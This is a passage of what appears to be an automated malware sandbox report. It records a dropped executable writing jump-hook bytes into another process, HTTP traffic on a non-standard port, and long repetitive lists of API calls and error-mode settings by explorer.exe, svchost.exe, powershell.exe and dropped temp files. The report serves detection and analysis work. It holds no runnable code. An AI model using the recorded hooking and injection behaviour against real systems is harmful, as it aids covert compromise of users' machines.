                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: BF0005 value: E9 8B 2F 79 76 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 77382F90 value: E9 7A D0 86 89 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 1050005 value: E9 2B BA 2F 76 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 7734BA30 value: E9 DA 45 D0 89 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 1060008 value: E9 8B 8E 33 76 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 77398E90 value: E9 80 71 CC 89 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 1080005 value: E9 8B 4D 8B 75 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 76934D90 value: E9 7A B2 74 8A Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 1090005 value: E9 EB EB 8B 75 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 7694EBF0 value: E9 1A 14 74 8A Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 10A0005 value: E9 8B 8A 88 74 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 75928A90 value: E9 7A 75 77 8B Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 10B0005 value: E9 2B 02 8A 74 Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeMemory written: PID: 7100 base: 75950230 value: E9 DA FD 75 8B Jump to behavior
                Uses known network protocols on non-standard ports
                Source: unknownNetwork traffic detected: HTTP traffic on port 2222 -> 63177
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,18_2_00423C1C
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,18_2_00423C1C
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004241EC IsIconic,SetActiveWindow,SetFocus,18_2_004241EC
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004241A4 IsIconic,SetActiveWindow,18_2_004241A4
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,18_2_00418394
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,18_2_0042286C
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004833BC IsIconic,GetWindowLongA,ShowWindow,ShowWindow,18_2_004833BC
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004175A8 IsIconic,GetCapture,18_2_004175A8
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00417CDE IsIconic,SetWindowPos,18_2_00417CDE
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,18_2_00417CE0
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,18_2_0041F128
                Source: C:\Users\user\AppData\Local\Temp\93B.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmpRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
